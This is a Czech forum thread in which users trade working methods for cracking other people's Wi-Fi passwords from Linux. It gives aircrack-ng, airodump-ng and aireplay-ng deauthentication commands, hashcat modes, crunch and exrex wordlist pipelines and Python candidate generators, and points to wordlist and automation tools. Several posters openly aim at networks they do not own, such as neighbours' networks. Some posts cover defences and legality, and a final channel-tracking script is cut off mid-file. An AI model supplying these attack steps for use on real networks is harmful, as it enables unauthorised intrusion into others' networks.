Fórum Root.cz

Hlavní témata => Sítě => Téma založeno: kareltomas 02. 12. 2019, 19:10:30

Název: Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: kareltomas 02. 12. 2019, 19:10:30
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Název: Re:Linux a sítě
Přispěvatel: robac 02. 12. 2019, 22:05:28
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Stručně: cizí WiFi zcela jistě prolomit lze, ale ani zdaleka ne vždy.
Podrobně se rozepisovat nemá cenu (soudě podle titulku a úrovně dotazu)...
Název: Re:Linux a sítě
Přispěvatel: František Ryšánek 02. 12. 2019, 22:34:54
Na U-trubce je spousta clickbaitu, o tom žádná.

Slovníkový útok hrubou silou může být dost rychlý v případě, že daná síť používá slovníkové heslo. Přesto to spíš nebude "lup a hotovo", pokud musí probíhat reálné autentikační transakce, protože zamítavá reakce naschvál chvíli trvá apod. Jo pokud by se útočník dostal k autentikační databázi (/etc/shadow apod. - prostě k hashům) a mohl je louskat offline, potom lze hesla zkoušet hodně rychle.

Pokud odhlédneme od slovníkových útoků hrubou silou, tak je taky rozdíl mezi různými autentikačními mechanismy. Starý WEP měl dost slabé šifrování, v dnešní době je považován za bezpečnostní díru. WPA2 je o dost odolnější. Údajně se nakonec dá taky lousknout "krytografickou hrubou silou", pokud člověk odposlechne a zaznamená dostatečný objem provozu (řádově hodiny při plném vytížení, pokud se nepletu) - tzn. opět to není "lup a hotovo".

Zajímavá díra je "WPS (https://routersecurity.org/wps.php)" v režimu zabezpečení PINem. Sice osmimístné číslo, ale reálně degradované asi na 4 číslice (11000 kombinací). I tak trvá řádově několik hodin, než je všechny vyzkoušíte.

A pak je taky fakt, že Windowsy mají hesla k wifi sítím uložená tak, že se k nim lze dostat prakticky obratem. Dřív na to býval nějaký pokoutní soft, dneska to lze údajně zjistit standardním příkazem na příkazové řádce (https://fossbytes.com/find-wifi-password-connected-networks-cmd-windows/)... a to je skutečně "lup a hotovo". Tzn. tady je počítač k síti už připojený, jenom to heslo potřebujete zjistit (např. kvůli dalšímu stroji, aby se dostal taky na wifinu).
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: _Jenda 03. 12. 2019, 00:57:18
Z mých poznámek (slovníkový, příp. u hashcatu kombinační -- asi se vyplatí zkusit všechna 8místná čísla, jinak nevím):
Kód: [Vybrat]
- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt
A existuje na to "wifite" aby člověk nemusel furt kopírovat ty MAC adresy a čísla kanálů.

frr: Handshake se dá vynutit pomocí deautentizace („odpojení“), protože tento paket je ve WPA2 nepodepsaný a můžeš ho zfalšovat pokud znáš MAC adresu AP a klienta (což odposlechneš). Klient se automaticky zkusí připojit znova a máš handshake. Útok je pak offline, je tam středně těžká PBKDF2 se SHA. /etc/shadow u wifi? Pasivní kryptografický útok na WPA2? O čem to mluvíš?!

A heslo, nebo přinejhorším jeho hash osolený SSID sítě (což je to co se ve skutečnosti používá jako kryptografický materiál) musí mít dostupný každý klient, je úplně jedno jestli Windows nebo wpa_supplicant. WPA2 (Personal) je symetrické… (a i kdyby nebylo, tak bych chtěl vidět protokol, který zajistí, že klienta nejde naklonovat)

A jinak co se týče WPA2-Enterprise, tak tam MITM na ten TLS kanál (drtivá většina klientů nebude ověřovat certifikát, protože je překvapivě komplikované to nastavit) a pak prolomit MSCHAPv2 hrubou silou (DES) nebo možná jsou na to rainbow tabulky (na něco jsou, viz crack.sh).
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: m1x 03. 12. 2019, 01:08:50
Sice bez linuxu, ale zato ze života:

Měl jsem na chvíli fyzický přístup k routeru, takže jediný problém byl vybrat si z té spousty možností (vyfotit si router zespodu kde je WPS PIN; nebo ťuknout do WPS tlačítka; připojit se na drátěný ethernet za routerem a zkusit konfiguraci; ...)

Použil jsem WPS tlačítko a android mobil a po připojení jen tak pro legraci nakliknul http://192.168.1.1/ konfiguraci routeru, kde jsem si přečetl heslo. Nedělám si srandu, za minutku hotovo. (Router patří kamarádovi, používám ho legálně. Když změnil heslo a nebyl v dosahu, bylo jednodušší se tam nakliknout a říct mu to až pak. Zabezpečení doteď nepořešil...)

Je spousta postranních cestiček. Nelámej hned hesla, hledej, lidi je sami nabízejí  :D někdy stačí fotka z fejsbůku s heslem na monitoru...
Název: Re:Linux a sítě
Přispěvatel: k3dAR 03. 12. 2019, 01:14:53
[...] WPA2 je o dost odolnější. Údajně se nakonec dá taky lousknout "krytografickou hrubou silou"[...]
u WPA2 bude rozdil zda jde o WPA2-TKIP (podobne WEP) nebo WPA2-CCMP/AES a taky zda bude/nebude vynucene jen to druhe, nebo povolene obe varianty...
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: kareltomas 20. 10. 2020, 11:09:03
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: _Jenda 20. 10. 2020, 13:22:33
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
https://linux.die.net/man/8/iwlist

Na některých distribucích není a je tam iw -- iw dev wlan0 scan
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 20. 10. 2020, 14:01:55
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
iwlist je nástroj na scanování wifi sítí ;) napiš si do terminálu
Kód: [Vybrat]
man iwlist  ;D ;D ;) ;)

..................
https://linux.die.net/man/8/iwlist

Na některých distribucích není a je tam iw -- iw dev wlan0 scan
kareltomáš má kali 2020 nóó a tam iwlist je :D ;)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: johanson14 20. 10. 2020, 16:30:54
Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...
Na lámanie hesiel, ktoré v slovníku nie sú je potrebné si zaplatiť výpočtový čas na super počítači, alebo k tomuto účelu využívaných výpočtových farmách.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Hamparle 20. 10. 2020, 17:00:19
Tak ono by to youtube video trvalo 10 hodin, kdyby se zkoušelo víc možností(třeba všechny) (zkratkovitě řečeno).

Ve skutečnosti taky nehádáš wifi heslo bruteforcí všema kombinacema... Vždy musíš mít nějak určené jaké kandidáty budeš zkoušet jinak bys to lámal roky. Někde to je slovník, kombinace slovníků (něco jako kartágský součin, nevýhoda je, že se z milionu kandidátů stane milion milioónů a to už mezitím se vyplatí vyjet na dovolenou do zahraničí než ti se ti v terminálu objeví SIGALRM že došlo k nalezení hesla), generátory, slovník s pravidlama a doufáš že to jednou vyjde.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Standa2017 20. 10. 2020, 17:07:13
Existují i hotové scripty https://github.com/derv82/wifite2 , kartu stačí přepnout do monitor modu a vybírat nadefinované funkce. A k prolomení stačí pár drobných BTC.

(https://camo.githubusercontent.com/1ac7a9a3b31777f65e7350c5b1d9c63d3cfea1b4/68747470733a2f2f692e696d6775722e636f6d2f4352386f4f70302e676966)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: kareltomas 23. 10. 2020, 22:36:40
Přemýšlím, jak chápat "připomínku" od uživatele johanson14, který uvádí "Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...". Mám to chápat, že mám pomocí příkazů již slovník vytvořený, ze skenované sítě???? V tom zase bude něco jednoduchého, ale nechytám se.... :-( :-( Beztak mi uživatelka "Wrána diskuze" odpoví jedním slovem :-) :-) :D
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: johanson14 24. 10. 2020, 01:34:37
Logika hovorí, že nieje možné náhodne získať heslo do niekoľkých minút tak ako je to uvedené na YT, teda určite nie stýlom á'la poďme sa pripojiť. Možno je ale možné otvoriť šifrovanú komunikáciu, aspoň sa mi marí, že som niekde videl PoC. Kde to bolo si nepamätám, ale tipujem, že google by to vedel.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: _Jenda 24. 10. 2020, 02:15:11
Logika hovorí, že nieje možné náhodne získať heslo do niekoľkých minút tak ako je to uvedené na YT
Já jsem takto hesla do wifi sítí už několikrát získal. Jednalo se třeba o hesla (změněno, ale invence toho, kdo je vymyslel, je stejná) ADAMADAM nebo eee54321. Taková hesla lze najít ve slovnících nebo vygenerovat jednoduchými pravidly, hashcat si s tím poradí snadno. Osobně používám slovník https://github.com/berzerk0/Probable-Wordlists a pak jeden specializovaný český, který bohužel nemohu sdílet. Nevím, o jakém videu se bavíte, na animovaném gifu v této diskuzi je uvedeno heslo "la bamba", což je mrzuté, protože mám slovník bez mezer, každopádně heslo la-bamba mám na pozici 56237371 a heslo la_bamba na pozici 70869507. Grafická karta by milion pokusů za sekundu mohla zvládnout (WPA-2 má poměrně pomalý algoritmus, ostatní věci to crackuje klidně miliardu pokusů za sekundu), takže získání uvedených hesel by trvalo minutu.
Název: Re:Linux a sítě
Přispěvatel: Venda Jetel 24. 10. 2020, 09:14:07
Podrobně se rozepisovat nemá cenu (soudě podle titulku a úrovně dotazu)...
;)
Název: Re:Linux a sítě
Přispěvatel: Venda Jetel 24. 10. 2020, 09:17:25
evidentně odborník  :D
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: johanson14 24. 10. 2020, 11:30:49
@Jenda
=> Já jsem takto hesla do wifi sítí už několikrát získal....
Myslím, že hovoríme o heslách, ktoré niesú v slovníku, alebo mi niečo ušlo? Tiež sa dá predpokladať, že lámač hesiel zrejme myslí také, ktoré sa nedajú generovať jednoduchými pravidly.
-> WPA-2 má poměrně pomalý algoritmus...
Na túto skutočnosť bol práve zameraný ten PoC, ktorý som v minulost niekde videl. Komunikáciu bolo možné otvoriť na dobu do výmeny klúčov, potom to bolo nutné znova spočítať. Obranou pred týmto bolo potrebné nastaviť rekeying na menšiu dobu ako býva štandardne nastavená.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 24. 10. 2020, 15:49:07
Přemýšlím, jak chápat "připomínku" od uživatele johanson14, který uvádí "Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...". Mám to chápat, že mám pomocí příkazů již slovník vytvořený, ze skenované sítě???? V tom zase bude něco jednoduchého, ale nechytám se.... :-( :-( Beztak mi uživatelka "Wrána diskuze" odpoví jedním slovem :-) :-) :D
slovník takle jednoduše nevyrobíš ten si asi jako musíš vodněkud stáhnout :D :) :) ;)

třeba z toho jendovýho githubovýho vodkazu hele (https://github.com/berzerk0/Probable-Wordlists/blob/master/Downloads.md)
nějaký volně dostupný český wordlisty sou tady hele (https://www.soom.cz/?name=download/kategorie&sid=30)
nóó nebo z nějakejch temějších koutků internetu ;D ;D ;) ;) nevim jestli mužu uplně přesně menovat nóó ale třeba na takový ty stránce s takovou pirátskou lodičku navobrázku kde si hodný lidi mezi sebou zadarmo pučujou seriály nebo filmy de taky nějaký ty wordlisty (ne český) stáhnout. zátoka nějaká se to menuje ;D ;D ;D ;D ;) ;)

btw johanson asi jako vodpovídal na uplně tvuj první dotaz z 2.12.2019 hele (https://forum.root.cz/index.php?topic=22176.msg321553#msg321553) :) ;)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 04. 11. 2020, 11:46:08
Je to už dost let z5 co se mi lousknou lokálního providera podařilo. Co si pamatuji tak jsem na to použil nějké spaciální disto ale hlavně to chtělo wifinu spaciální.  a tou byla netgear wn111v2. Jedině s tou to šlo, ta má cosi odemčené..ale jak jsem to už dělal si nepamatuju..
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: MikyM 10. 11. 2020, 22:24:09
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.

Pěkné téma :-)

Ale když máme tu COVID sezónu...
Existuje distribuce Kali Linux, která má hromadu nástrojů nejen pro WiFi.
Pro tento účel existuje seznam doporučených karet pro danou distribuci.
Ano na youtube mají vše připravené dopředu, zprostředkují jen postup.
WPS PIN je problém a otevřená vrátka. Slušní výrobci dodávají zařízení s touto funkcí vypnutou nebo nechávají jen tlačítko.

Případný úspěch či neúspěch bude zavislý na daném zařízení a člověku, který ho spravuje.
Ze zkušeností z návštěv u známých na to většina lidí kašle a nastaví něco co je zapamatovatelné.

Obecně dnešní programy dokáží prolomit heslo typu M0j3D0mAc1W1F1 a to načtením slovníku a vygenerování různých variant kdy místo písmenka doplní číslo a provedou jiné transformace.

Avšak na heslo typu l77S48Ew$`rD|$U;|cdH4Q$gvulphPqkN66?s^Y6Rj to aplikovat moc nepůjde a případné nalezení bude dílo náhody.

U WPA2-AES-PSK došlo k usnadnění díky PKMID. Nicméně toto lze u chytřejších zařízení vypnout.
Co se týče deauth tak k velké škodě je velmi málo zařízení, které umí protected management frames (jak AP tak klient).

WPA2-EAP-TLS - Pokud se ověřují obě strany vůči sobě certifikátem tedy i klient má vynucené ověření protější strany pak takřka nemáš šanci v době psaní tohoto příspěvku.

WPA2-EAP-TTLS - To už je trochu jiný příběh ale pořad lepší než PSK.

Pokud někomu instaluji domácí WiFi tak samozřejmě nepočítám s tím, že si dotyčný bude generovat certifikáty a dělat jejich správu. Od doby kdy existuje nativní podpora QR codes pro nastavení WiFi mi moc nedává smysl proč si lidé nevygenerují silné náhodné heslo, vytisknou QR Code a přilepí třeba na lednici. Navíc QR code umí vygenerovat i mobilní telefon ze kterého se to dá ukázat návštěvě/další členům domácnosti.

Což mě přivádí k myšlence teoretického útoku v husté zástavbě kde dalekohledem/foťákem koukáš sousedům přes okno a hledáš lednici zda tam nevisí papírek s heslem k WiFi....;-)

Závěrem, pokus o neoprávněné zneužití prostředků třetí strany v tomto kontextu bude s největší pravděpodobností v konfliktu s právní úpravou ČR. Dotčená strana musí s tímto činem souhlasit tedy např. objednávkou penetračních testů.
Příspěvek není nabádání k tomuto konání a autor doporučuje tyto pokusy provádět jen na zařízeních, které zadavatel přísvěvku vlastní nebo na zařízeních u kterých dotčená strana s tímto jednáním souhlasí. 
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 11. 11. 2020, 10:05:03
Zrovna rozbaluji kali linux pro rpi zerow, bydlím v paneláku kde je těch wifi hafo k výběru..budu postupovat podle tohoto návoduhttps://www.youtube.com/watch?v=jdtsluz4hC4 (https://www.youtube.com/watch?v=jdtsluz4hC4)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 11. 11. 2020, 14:27:59
Heslo k WiFi je 7+7 stejných číslic. Když si vygeneruji přes crunch všechny kombinace 7 číslic, tak heslo nenajde.
Netušíte, jestli by nějak nešlo zadat v aircrack-ng, aby zkoušel 7+7 stejných číslic a nemusel jsem generovat kombinace pro 14 číslic (což už by zabralo hromadu místa).
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 11. 11. 2020, 16:05:31
Heslo k WiFi je 7+7 stejných číslic. Když si vygeneruji přes crunch všechny kombinace 7 číslic, tak heslo nenajde.
Netušíte, jestli by nějak nešlo zadat v aircrack-ng, aby zkoušel 7+7 stejných číslic a nemusel jsem generovat kombinace pro 14 číslic (což už by zabralo hromadu místa).
mužeš to spojit trubičkou | nóó a pak se nic na disk zapisovat nebude a rovnou se to bude strkat do aircracku hele (https://coders.ph/post/how-to-use-aircrack-ng-to-bruteforce-wpa2-passwords)  :o ;)
Kód: [Vybrat]
příklad z jejich stránek
crunch 8 8 0123456789 -s 70000000 | aircrack-ng -w - -b AA:BB:CC:DD:00:11 /path/to/handshake.cap
crunch boužel asi neumí nějaký složitější patterny :o :( víc lepšejší mi jako připadá nástroj exrex hele (https://github.com/asciimoo/exrex) kterej umí jakoby vygenerovat všecky možný kombinace znaků který muže zachytit danej regulární výraz. v tvým případě pro generování hesel 7 stejnejch čísel + 7 stejnejch čísel takle nějak  :D ;)
Kód: [Vybrat]
exrex '(\d)\1{6}(\d)\2{6}' | aircrack-ng blablablah
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 11. 11. 2020, 17:23:25
To by bylo úžasné a byl bych ti vděčen, kdyby ten exrex fungoval, protože místo na vygenerovaný wordlist 'crunch 14 14 1234567890' vůbec nemám.
Hledal jsem 'crunch aircrack-ng example' a ta spojovací roura mi docvakla až pozdě.
Zkoušel jsem 'crunch 7 7 1234567890 | crunch 7 7 1234567890 | aircrack-ng -e ssid -w - /home/user/ssid.cap', což je blbost, protože to hned zkolabuje a hlavně by to nezaručilo 2x stejné čísla. Hlavně aircrack-ng musí dostat minimálně 8 znaků, jinak se ukončí.
Jdu to ukusit s tím exrex.

Edit: Asi jsem to napsal blbě, ale kdyby bylo heslo 25489762548976, tak jak by vypadal příkaz do toho exrexu?
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 11. 11. 2020, 21:04:59
Jsem z toho pako, tohle exrex '\d{7}\d{7}' je to samé jako exrex '\d{14}'. Už jsem do tohodle exrex '\d{7}\d{7}' zkoušel dávat závorky nebo rouru a nic
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 12. 11. 2020, 07:20:44
Už jsem na to přišel exrex '([1-9]{7})\1', když vidím ty všelijaké lomítka a závorky, tak z toho mám mlhu  ;D
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 13. 11. 2020, 14:06:39
Už jsem na to přišel exrex '([1-9]{7})\1', když vidím ty všelijaké lomítka a závorky, tak z toho mám mlhu  ;D
supr :D
regexpy taky furt strkám do googlu  ;D ;D ;) ;) celkem praktický se mi zdá todleto webový ide hele (https://regex101.com/) ;)
...............Zkoušel jsem 'crunch 7 7 1234567890 | crunch 7 7 1234567890 | aircrack-ng -e ssid -w - /home/user/ssid.cap'.............
crunch s crunchem trubičkou spojit nejde :-\ ;)
to dvojitý číselný heslo by šlo kdyby se jakoby vždycky zdvojil výstupní string třeba takle nějak
Kód: [Vybrat]
crunch 7 7 0123456789 | while read i; do echo $i$i; done | aircrack
bashový lidi možná znaj nějakej lepšejší způsob než jak sem to napsala já :o :)

noa ještě kdyby ti ani tamten exrex nestačil tak si furt mužeš napsat nějakej svuj skriptík
Kód: [Vybrat]
#!/usr/bin/env python3
pswd_len = 7
opakovani = 2

for i in range(10**pswd_len):
    heslo = str(i)
    heslo = (pswd_len - len(heslo)) * '0' + heslo
    print(heslo * opakovani)
a strčit ho do aircracku tou trubičkou :D ;)
Kód: [Vybrat]
/nejaka/cesta/josefuv_skript.py | aircrack
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Vykook 14. 11. 2020, 22:48:40
Jestli se ti doma válí nějaké raspberry pi, tak https://pwnagotchi.ai/ v kombinaci s pluginy onlinehashcrack.py a wpa-sec.py dovede vcelku dost. Samozřejmě je třeba všechno zablacklistovat a testovat jen na vlastní wifi...

edit: na pozadí  to používá tohle https://www.bettercap.org/  což můžeš normálně nainstalovat na libovolném linuxu a handshakama nakrmit hashcat a nebo ty dvě služby sám. Pro hračičky je ale lepší varianta s rpi zero a eink displejem ;-)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 16. 11. 2020, 10:17:47
nejlepší hesla jsou obyčejná na které je každý slovník krátký a které si zapamatujete, stačí jen vědět jak.
tak například slova z nářečí-viz film "Kód Navajo" ..tak třeba "šutrovákobzola" nebo "šalínanaprýgl" a zkuste na to přijít.
Ale teď ty skutečné založené na čísle, znaku a písmenech.
dnes je : 16.11.2020
tak tedy např. : "16.lIStopadu2020"
kdyby bylo 6.12.2020 - "06.pROsince2020"
do kalenáře pak stačí udělat barevnou tečku abych si i po dovolené pamatoval co za heslo tam mám. Hodí se to na systémy kdy se heslo mění každých 72 dní (např.) a když těch systémů máte v práci několik a mění se v různé dny pak může mít i víc hesel a nebo je ujednotit k jednomu datumu.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: hahel16625 16. 11. 2020, 11:00:36
mi moc nedává smysl proč si lidé nevygenerují silné náhodné heslo, vytisknou QR Code a přilepí třeba na lednici. Navíc QR code umí vygenerovat i mobilní telefon ze kterého se to dá ukázat návštěvě/další členům domácnosti.


Dříve jsem se snažil být chytroprd a měl jsem doma jako wifi heslo 63 náhodných znaků. Myslel jsem si, že ta trocha nepohodlí stojí za vyšší zabezpečení (wifi je v bytovém domě).
A po pár letech jsem uznal, že to nejde. Televize, tiskárny a další podobné zařízení se mění častěji, než člověk čeká a zadat tam 63 náhodných znaků je v podstatě nemožný úkol. To, že mobily umí načíst heslo z QR kódu je strašně hezké, ale neřeší to hromadu zařízení, kde se to musí dělat nesmírně komplikovaně.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 16. 11. 2020, 14:52:26
když už budu chtít zabezpečit wifi v paneláku v Praze (kde bydlím) tak použiju radius a ať si každý člen domácnosti zvolí vlastní heslo (třeba ten radius co mám na nas synology) a skryju ssid..a ať se mi tam někdo snaží dostat....jo a základ..moje rodina s mobilama a s tabletama se snaží dostat do internetu..když notebook tak do sítě aby se dostali na tiskárnu. ale i u tiskárny mohu zapnout wifi direct a umožnit jim tisknout jen se znalostí hesla. a ani tam se mi nedostane šmejd kdby chtěl.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Standa2017 16. 11. 2020, 15:03:50
Doma používám hostapd + freeradius a webUI daloradius (http://daloradius.com).
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 16. 11. 2020, 15:49:41
no já si teď na synology nastavil ldap server a radius server, musím se ještě rodiny zeptat večer co všechno připojují na wifi a nastavit do ldapu účty i pro mobily a tablety...no a mikrotik (až doma nastavím cAP ac) tak to spustím i na mikrotiku...a každé zařízení bude mít své přístupové heslo..a ať se někdo snaží to lousknout...
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: hahel16625 16. 11. 2020, 16:42:13
když už budu chtít zabezpečit wifi v paneláku v Praze (kde bydlím) tak použiju radius a ať si každý člen domácnosti zvolí vlastní heslo (třeba ten radius co mám na nas synology) a skryju ssid..
Zajímavá kombinace. Na jednu stranu doma řešit radius. A na druhou stranu dělat tak zbytečnou věc, jako skrývání ssid.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 17. 11. 2020, 15:57:45
nejlepší hesla jsou obyčejná na které je každý slovník krátký a které si zapamatujete, stačí jen vědět jak.
tak například slova z nářečí-viz film "Kód Navajo" ..tak třeba "šutrovákobzola" nebo "šalínanaprýgl" a zkuste na to přijít.
nóó obyč slovník nato asi jako fakt bude krátkej ale pořád takový slovíčka respektujou různý češtinový pravidla jakože se často střídaj souhlásky a samohlásky v určitejch frekvencích nebo žeje poslepovaný z různejch platnejch slabik danýho jazyka  :) ;)

a vubec mezi večinou všech možnejch hesel určitě jako bude nějaká pravidelnost a asi by byl zajímavej pokus si ty hesla zkusit z velikánskýho korpusu uniklejch generovat neuronovou sítí  :D ;)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Jiří Šachl 17. 11. 2020, 16:37:29
stačí slovo který nazná nikdo na světě a ještě s chybou " pyča.....
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Hamparle 17. 11. 2020, 18:56:49
Když sem takhle vpluju jak orel  napole bez varování, umí hashcat nějak rozumně kombinovat slovníky (za účelem skládání slov než vpočtu 2) ?

Má sice možnost použít 2 slovníky jako kartézskýsoučin, (nějaká hodnota parametru -a) ale 2 slova jsou málo a pak si ani nejsem jistý jestli v tomto režimu umí třeba aplikovat pravidla (-r) , například dát mezery mezi slova a neboříct,aby na první a poslední slovo použil nějaké pravidlo


Nebo se musí zvolit externí generátor kombinací (ne nutně lamersky si kombinace vygenerovat do souboru)?
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: novak_josef_2019 20. 11. 2020, 07:08:34
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 21. 11. 2020, 22:33:17
stačí slovo který nazná nikdo na světě a ještě s chybou " pyča.....
'py' i 'ča' najdeš mezi platnejma českejma slabikama ;D ;)
nóó a když budeš jakoby brát slovíčka z různejch internetovejch diskuzí tak tam na takový slovíčko narazíš brzy určitě ;D ;D

Když sem takhle vpluju jak orel  napole bez varování, umí hashcat nějak rozumně kombinovat slovníky (za účelem skládání slov než vpočtu 2) ?

Má sice možnost použít 2 slovníky jako kartézskýsoučin, (nějaká hodnota parametru -a) ale 2 slova jsou málo a pak si ani nejsem jistý jestli v tomto režimu umí třeba aplikovat pravidla (-r) , například dát mezery mezi slova a neboříct,aby na první a poslední slovo použil nějaké pravidlo


Nebo se musí zvolit externí generátor kombinací (ne nutně lamersky si kombinace vygenerovat do souboru)?
v hashcat-utils je nějakej kombinátor kterej by měl umět vyrobit slovník až ze tří různejch ale nevim nezkoušela sem :o :o
vobyč kombinátor by jako měl umět dělat kombinování pravidel + dvou slovníků hele (https://hashcat.net/wiki/doku.php?id=combinator_attack) ale furt jeto jakoby+- generování slovníku předem takže asi jako ne uplně to co bys jako potřeboval ??? :(
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
si myslim že airodump sám vo sobě nato je moc tupej :o :( leda asi jako parsovat výstup toho airodumpu a hlídat když se přestanou ty beacony voběvovat noa pak killnout udělat scan podle původní bssid najít novej kanál a pustit chytání znova :o :o

nadruhou stranu je takový dost nepravděpodobný že se ten kanál bude měnit nějak moc často noa když by se někdo bránil tak by asi taky jako moh změnit mac a essid a vubec natebe vlítnout s pohrabáčem v ruce ;D ;D ;) ;)
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Martin Zixo 24. 11. 2020, 16:50:53
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.

Oznacovat nieco za konspiraciu, len na zaklade vlastnej nevedomosti je hlupe.
Název: Re:Prolomení hesla do Wi-Fi sítě z Linuxu
Přispěvatel: Wrána diskuze 24. 11. 2020, 17:45:54
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
už mě to jako vomrzelo takže si dodělej sám ;D ;)
za chyby a prasečiny neručim ;D ;)
Kód: [Vybrat]
#!/usr/bin/env python3

import sys
from subprocess import Popen, PIPE
import re
import time
import logging

# mac adresa cílený
target_bssid = '01:23:45:67:89:AB'

# prefix zapisovanejch *.cap souborů a podobnejch
wr_prefix = 'chyceno'

# monitorovovací interface
interface = '0mon'

# minimální rate beaconů za seknudu
# když naměřenej rate klesne pod tudletu hodnotu tak si jako myslíme že
# ta naše stanice zmenila kanál z nějakýho důvodu :D ;D
min_rate = 5.0

